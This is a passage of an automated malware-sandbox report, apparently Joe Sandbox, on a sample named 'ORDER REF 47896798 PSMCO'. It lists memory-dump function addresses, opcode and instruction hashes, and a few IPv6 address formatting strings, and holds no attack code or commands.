                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: df6ad809aa6481d9b73cb2ac96bc2fe41e4fdeac59eba855f606ed950ed6ae4f
                                                                                            • Instruction ID: 67b1cd01cdffa99f1cbd5483b7b78d7a8dd1828bd2662b85771e46ae3f4b8435
                                                                                            • Opcode Fuzzy Hash: df6ad809aa6481d9b73cb2ac96bc2fe41e4fdeac59eba855f606ed950ed6ae4f
                                                                                            • Instruction Fuzzy Hash: 2E9002A1201640924640F2598408B0A854997E0201B55C016F5095560CC52589519735
                                                                                            Function 01942AD0 Relevance: .0, Instructions: 4COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: ac8922571743362e81a054566b180ab56600170f4a1e55186dd3ceec850b03e0
                                                                                            • Instruction ID: cba5cde2b31de327049d2ae3c225d98ead888f12ff06ce022f8e430e382ce612
                                                                                            • Opcode Fuzzy Hash: ac8922571743362e81a054566b180ab56600170f4a1e55186dd3ceec850b03e0
                                                                                            • Instruction Fuzzy Hash: FD900435311500030345F55D070C50740CFD7D5351355C031F5057550CD731CD715731
                                                                                            Function 01942AF0 Relevance: .0, Instructions: 4COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 8f528261cd5b561cb9d2abf95391533303ce3ae41f0ad60d351feb2e07db4c76
                                                                                            • Instruction ID: 0ca346acbda112cf7ad2f240447a40b59918125c3f070a25eabdfd941d7bd698
                                                                                            • Opcode Fuzzy Hash: 8f528261cd5b561cb9d2abf95391533303ce3ae41f0ad60d351feb2e07db4c76
                                                                                            • Instruction Fuzzy Hash: 67900225221500020285F559060850B4489A7D6351395C015F5457590CC62189655721
                                                                                            Function 01942DB0 Relevance: .0, Instructions: 4COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: a2608f80bd95b1b06e333ed20dabae543500500f21683c4f86754d9e6a20fabf
                                                                                            • Instruction ID: 133b07500af07e13fe7b5d7b903a6b114ab90960dd9b97dd22d5d5e842c35e10
                                                                                            • Opcode Fuzzy Hash: a2608f80bd95b1b06e333ed20dabae543500500f21683c4f86754d9e6a20fabf
                                                                                            • Instruction Fuzzy Hash: 7F90023124150402D281B1594408606404DA7D0241F95C012B4465554EC6558B56AF61
                                                                                            Function 01942DD0 Relevance: .0, Instructions: 4COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 9a398c2c2856168b3e3d390d5d22eeabd518fe17515f6a18ee18356ba1fe90dc
                                                                                            • Instruction ID: e4d2f0468b64483df219975b6e2f29f0d84f9b962ea6c6f49270841ebce41c83
                                                                                            • Opcode Fuzzy Hash: 9a398c2c2856168b3e3d390d5d22eeabd518fe17515f6a18ee18356ba1fe90dc
                                                                                            • Instruction Fuzzy Hash: 1C900221242541525685F1594408507804AA7E0241795C012B5455950CC5269956DB21
                                                                                            Function 01942D10 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 5c81b33e91c799f21d8b709fcdda65623ba58ccc9cb7d974f051adf5e5fd4b5b
                                                                                            • Instruction ID: 78331191ac51268fc41511ab424e4a4168ded7facc796d67bd2dd8d2f4c7056b
                                                                                            • Opcode Fuzzy Hash: 5c81b33e91c799f21d8b709fcdda65623ba58ccc9cb7d974f051adf5e5fd4b5b
                                                                                            • Instruction Fuzzy Hash: 5E90022921350002D2C0B159540C60A404997D1202F95D415B4056558CC91589695721
                                                                                            Function 01942D00 Relevance: .0, Instructions: 4COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: b3e07528b0641f250b29bf70825210075b26758f7fd397720d4e62083662978e
                                                                                            • Instruction ID: 2f68990b492502659dcdd4630fadf6a1cc846f38f424c76efbdeadc318ed0d52
                                                                                            • Opcode Fuzzy Hash: b3e07528b0641f250b29bf70825210075b26758f7fd397720d4e62083662978e
                                                                                            • Instruction Fuzzy Hash: 0C90022120554442D240B559540CA06404997D0205F55D011B50A5595DC6358951A731
                                                                                            Function 01942D30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 67fc367191a28d0964ba38786e35b3e696e26ac8d15a55cbf0e0bb66c98e8b94
                                                                                            • Instruction ID: 202a8edbd0d4c1155b168fe9fbc07fa2e6b9ef06f291f9e45340017d15b20a43
                                                                                            • Opcode Fuzzy Hash: 67fc367191a28d0964ba38786e35b3e696e26ac8d15a55cbf0e0bb66c98e8b94
                                                                                            • Instruction Fuzzy Hash: B790022130150003D280B159541C6068049E7E1301F55D011F4455554CD91589565722
                                                                                            Function 01942CA0 Relevance: .0, Instructions: 4COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: de49b67046c21e049640b5a0f0e61a9265553a1760e56a93f7b59e67b81939c7
                                                                                            • Instruction ID: 17a95f6003e07bd070054751a87bb387a040067cf0348a2e775181a8a6c693b7
                                                                                            • Opcode Fuzzy Hash: de49b67046c21e049640b5a0f0e61a9265553a1760e56a93f7b59e67b81939c7
                                                                                            • Instruction Fuzzy Hash: 5790023120150402D240B599540C646404997E0301F55D011B9065555EC66589916731
                                                                                            Function 01942CC0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: d7ba9c0f3344874126010a5552cd2507a416072ea3a7e584a5144292ed5c7ecc
                                                                                            • Instruction ID: afae3b89d87b67c078b5dcbe452a7343d9532c06af1b3288c0a6a86223cde00a
                                                                                            • Opcode Fuzzy Hash: d7ba9c0f3344874126010a5552cd2507a416072ea3a7e584a5144292ed5c7ecc
                                                                                            • Instruction Fuzzy Hash: B390022160550402D280B159541C706405997D0201F55D011B4065554DC6598B556BA1
                                                                                            Function 01942CF0 Relevance: .0, Instructions: 4COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 976c576f350a00a07f6e52fff7c530ab75b7735f1c3f5aaa9ee94ee7046996ae
                                                                                            • Instruction ID: 810c0bf08632375a3842c682741c699e79962eecd7eb2a3fea054ba50ca56993
                                                                                            • Opcode Fuzzy Hash: 976c576f350a00a07f6e52fff7c530ab75b7735f1c3f5aaa9ee94ee7046996ae
                                                                                            • Instruction Fuzzy Hash: 2A90043130150403D340F15D550C707404DD7D0301F55D411F447555CDD757CD517731
                                                                                            Function 01942C60 Relevance: .0, Instructions: 4COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: a8a9c169a1a9e2b0b186bf06a7a4d762c98910f6722d60c441f3b0cf991524ff
                                                                                            • Instruction ID: c6a364c2d22557aecce047551b1663a263436ff22af5cd7bc737c6856cf3ae9a
                                                                                            • Opcode Fuzzy Hash: a8a9c169a1a9e2b0b186bf06a7a4d762c98910f6722d60c441f3b0cf991524ff
                                                                                            • Instruction Fuzzy Hash: 1390023120150842D240B1594408B46404997E0301F55C016B4165654DC615C9517B21
                                                                                            Function 01942F90 Relevance: .0, Instructions: 4COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: ed2e7df06b6bc1d000a6ea0e3f367d965c80856e54fa4584b8051384f7760304
                                                                                            • Instruction ID: 68ce0a9fe67b81f7a7888a54257ea9ccac2a684184924b16bb93a11b43c4db21
                                                                                            • Opcode Fuzzy Hash: ed2e7df06b6bc1d000a6ea0e3f367d965c80856e54fa4584b8051384f7760304
                                                                                            • Instruction Fuzzy Hash: A390023120190402D240B159481870B404997D0302F55C011B51A5555DC62589516B71
                                                                                            Function 01942FB0 Relevance: .0, Instructions: 4COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 1246320ed6a7068974585e79aad1e15971d8f77576a15fb48454922a0968edad
                                                                                            • Instruction ID: 5c9cba26718e1dd307802ea4a283a1d47118aa9a5e2c58c91b1684814c9ec272
                                                                                            • Opcode Fuzzy Hash: 1246320ed6a7068974585e79aad1e15971d8f77576a15fb48454922a0968edad
                                                                                            • Instruction Fuzzy Hash: 48900221601500424280B16988489068049BBE1211755C121B49D9550DC55989655B65
                                                                                            Function 01942FA0 Relevance: .0, Instructions: 4COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: c72867dd115ebfdbc7ad406c45fe7afdb1d511ebd59bb66dc076e74cace03379
                                                                                            • Instruction ID: 56d02ca4483a08ef4428297d2d5359b7a10a5c45bf5b1ca7100254833840e986
                                                                                            • Opcode Fuzzy Hash: c72867dd115ebfdbc7ad406c45fe7afdb1d511ebd59bb66dc076e74cace03379
                                                                                            • Instruction Fuzzy Hash: 7390023120190402D240B159480C747404997D0302F55C011B91A5555EC665C9916B31
                                                                                            Function 01942FE0 Relevance: .0, Instructions: 4COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 251825e3c095714ceecb8a65214979b61e0474f45a40132801f4430a6b943416
                                                                                            • Instruction ID: a6727d076f15cf7010e8f99b1d85c01015b1be56689479d6a029d5d3dd76095f
                                                                                            • Opcode Fuzzy Hash: 251825e3c095714ceecb8a65214979b61e0474f45a40132801f4430a6b943416
                                                                                            • Instruction Fuzzy Hash: E7900221211D0042D340B5694C18B07404997D0303F55C115B4195554CC91589615B21
                                                                                            Function 01942F30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 176d2a908984f57acf02398a4b39ea35539172f62611458db9005b87c133d156
                                                                                            • Instruction ID: 923294b8918bc95aa4acfbaed688125ab1885732493dee8aed20d7ffdab2b7cb
                                                                                            • Opcode Fuzzy Hash: 176d2a908984f57acf02398a4b39ea35539172f62611458db9005b87c133d156
                                                                                            • Instruction Fuzzy Hash: B090026134150442D240B1594418B064049D7E1301F55C015F50A5554DC619CD526726
                                                                                            Function 01942F60 Relevance: .0, Instructions: 4COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 43d0cbeda166d58c2a953da3e3a806f5f824e50ac1cc889b9b21ce6b08eeef51
                                                                                            • Instruction ID: 0480acfcbab78766a2c1a87f5f15600193718815c79056b28fd3f444228049d2
                                                                                            • Opcode Fuzzy Hash: 43d0cbeda166d58c2a953da3e3a806f5f824e50ac1cc889b9b21ce6b08eeef51
                                                                                            • Instruction Fuzzy Hash: 9D90026121150042D244B1594408706408997E1201F55C012B6195554CC5298D615725
                                                                                            Function 01942E80 Relevance: .0, Instructions: 4COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 6d8fd6f6a9e5929b03c8d50d4b270d91a1257001aeed0404e9532516df799443
                                                                                            • Instruction ID: 51bd608f8ba8cf4609c1f9b6b3ed1c1e1554f483c0df9baca89addd65ea9548c
                                                                                            • Opcode Fuzzy Hash: 6d8fd6f6a9e5929b03c8d50d4b270d91a1257001aeed0404e9532516df799443
                                                                                            • Instruction Fuzzy Hash: 3190022160150502D241B1594408616404E97D0241F95C022B5065555ECA258A92A731
                                                                                            Function 01942EA0 Relevance: .0, Instructions: 4COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 99d0683e6117a996db65e24d2534463ab6c8a408a5d948878eaf244ffbb2b789
                                                                                            • Instruction ID: 3bdc937c1e8cd6b18a5a792c99863c517336df0d0ab3a1befe03c2d3a0e56189
                                                                                            • Opcode Fuzzy Hash: 99d0683e6117a996db65e24d2534463ab6c8a408a5d948878eaf244ffbb2b789
                                                                                            • Instruction Fuzzy Hash: D390027120150402D280B1594408746404997D0301F55C011B90A5554EC6598ED56B65
                                                                                            Function 01942EE0 Relevance: .0, Instructions: 4COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: a7d532de87e2ba1c9db5c4c4980a6d40b4f1dcc1554746b21b3da93382340323
                                                                                            • Instruction ID: c8c9067ee9eb1cbc395714f12876e5b0aaba3fed60432e13a3a31741b3821b5c
                                                                                            • Opcode Fuzzy Hash: a7d532de87e2ba1c9db5c4c4980a6d40b4f1dcc1554746b21b3da93382340323
                                                                                            • Instruction Fuzzy Hash: A590026120190403D280B5594808607404997D0302F55C011B60A5555ECA298D516735
                                                                                            Function 01942E30 Relevance: .0, Instructions: 4COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: df3084ccd2195f72b52744f43e867c65175cf4f029b127bc1b2eff24f979930f
                                                                                            • Instruction ID: 3c378bca316dad4914b87f7a275b85008f7518a054f782da0443e858953f4afd
                                                                                            • Opcode Fuzzy Hash: df3084ccd2195f72b52744f43e867c65175cf4f029b127bc1b2eff24f979930f
                                                                                            • Instruction Fuzzy Hash: 6890022130150402D242B1594418606404DD7D1345F95C012F5465555DC6258A53A732
                                                                                            Function 01943090 Relevance: .0, Instructions: 4COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 173cede35e725fe1269b52605fe20743b3638e6fb2fdaddcfbab7ce461468b70
                                                                                            • Instruction ID: 825bb55cf4ec9a126e1226ec9bd54a7bcce2b1085b03953f9048c710a1bcc595
                                                                                            • Opcode Fuzzy Hash: 173cede35e725fe1269b52605fe20743b3638e6fb2fdaddcfbab7ce461468b70
                                                                                            • Instruction Fuzzy Hash: DE90022124150802D280B1598418707404AD7D0601F55C011B4065554DC6168A656BB1
                                                                                            Function 01943010 Relevance: .0, Instructions: 4COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: eba48a3d06a09cf5f176e9e1a559747d1c5f815523d9b62ecf107c1e0747b487
                                                                                            • Instruction ID: 4a05b9e71845268d3bda3728a94653b9195ab28911f37a93b0bdca614f2cf02d
                                                                                            • Opcode Fuzzy Hash: eba48a3d06a09cf5f176e9e1a559747d1c5f815523d9b62ecf107c1e0747b487
                                                                                            • Instruction Fuzzy Hash: 6090022120194442D280B2594808B0F814997E1202F95C019B8197554CC91589555B21
                                                                                            Function 019439B0 Relevance: .0, Instructions: 4COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 742e60def601de45e08472f7821751f056fc85648bfd2dfd3c039079676265d7
                                                                                            • Instruction ID: cdc4e8d5f4e9865cf39abc556c9f863f1c62ce58c21cd1acc8a2072fdf85c308
                                                                                            • Opcode Fuzzy Hash: 742e60def601de45e08472f7821751f056fc85648bfd2dfd3c039079676265d7
                                                                                            • Instruction Fuzzy Hash: 2590022124555102D290B15D44086168049B7E0201F55C021B4855594DC55589556721
                                                                                            Function 01943D10 Relevance: .0, Instructions: 4COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 19d5efb4d3bc6ffab7ea925fae28384462f353c2a99474d6508c5b0e9975fd63
                                                                                            • Instruction ID: 0a6c87fde1adf9e8b98d651f80d7a74c97a259fb4806d8112a70bca9bd8c2394
                                                                                            • Opcode Fuzzy Hash: 19d5efb4d3bc6ffab7ea925fae28384462f353c2a99474d6508c5b0e9975fd63
                                                                                            • Instruction Fuzzy Hash: E6900231202501429680B2595808A4E814997E1302B95D415B4056554CC91489615721
                                                                                            Function 01943D70 Relevance: .0, Instructions: 4COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: a0782fc1096334bcf8606e71b4169dc71a065d7b0defcbced6004c94bedc33d6
                                                                                            • Instruction ID: c0dd936414fac6228882ae1d7af0a42bab7f300c67065587a9b406b78123b22c
                                                                                            • Opcode Fuzzy Hash: a0782fc1096334bcf8606e71b4169dc71a065d7b0defcbced6004c94bedc33d6
                                                                                            • Instruction Fuzzy Hash: AF90023520150402D650B1595808646408A97D0301F55D411B4465558DC65489A1A721
                                                                                            Function 01942C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                            • Instruction ID: c8d67e31b4a9b14d32404b6eb8328d285899780ee0be309bd48d48352ee3df5c
                                                                                            • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                            • Instruction Fuzzy Hash:
                                                                                            Function 01942890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID: ___swprintf_l
                                                                                            • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                            • API String ID: 48624451-2108815105
                                                                                            • Opcode ID: c416d91c1dcb682fe8bdd0fd28d8d78ccb216fd2e51fa39a6ef8e6e47dd5156c
                                                                                            • Instruction ID: a5be1ac1b0b4e1453ffe0a3b891ebfbad569f8ed134795927f828b9f1dbc42d0
                                                                                            • Opcode Fuzzy Hash: c416d91c1dcb682fe8bdd0fd28d8d78ccb216fd2e51fa39a6ef8e6e47dd5156c
                                                                                            • Instruction Fuzzy Hash: 5F51D5B6A00216AFDB21DFAC9990D7EFBB8BB482417148629F56DD7642D334DE40C7A0
                                                                                            Function 019B2410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID: ___swprintf_l
                                                                                            • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                            • API String ID: 48624451-2108815105
                                                                                            • Opcode ID: c3922fd54142b87ff5f0664b28db6d6616939ee2c9fb4445f880275ba4e25218
                                                                                            • Instruction ID: 15a7ea1cbb722eaec51093e49c44523ed576f8355280f295b89cbde30be54ad5
                                                                                            • Opcode Fuzzy Hash: c3922fd54142b87ff5f0664b28db6d6616939ee2c9fb4445f880275ba4e25218
                                                                                            • Instruction Fuzzy Hash: 3551E571A00645AECB24DF5DCAD09BFB7FDEB44201B04886DE59AD7641E6B8FA40C760
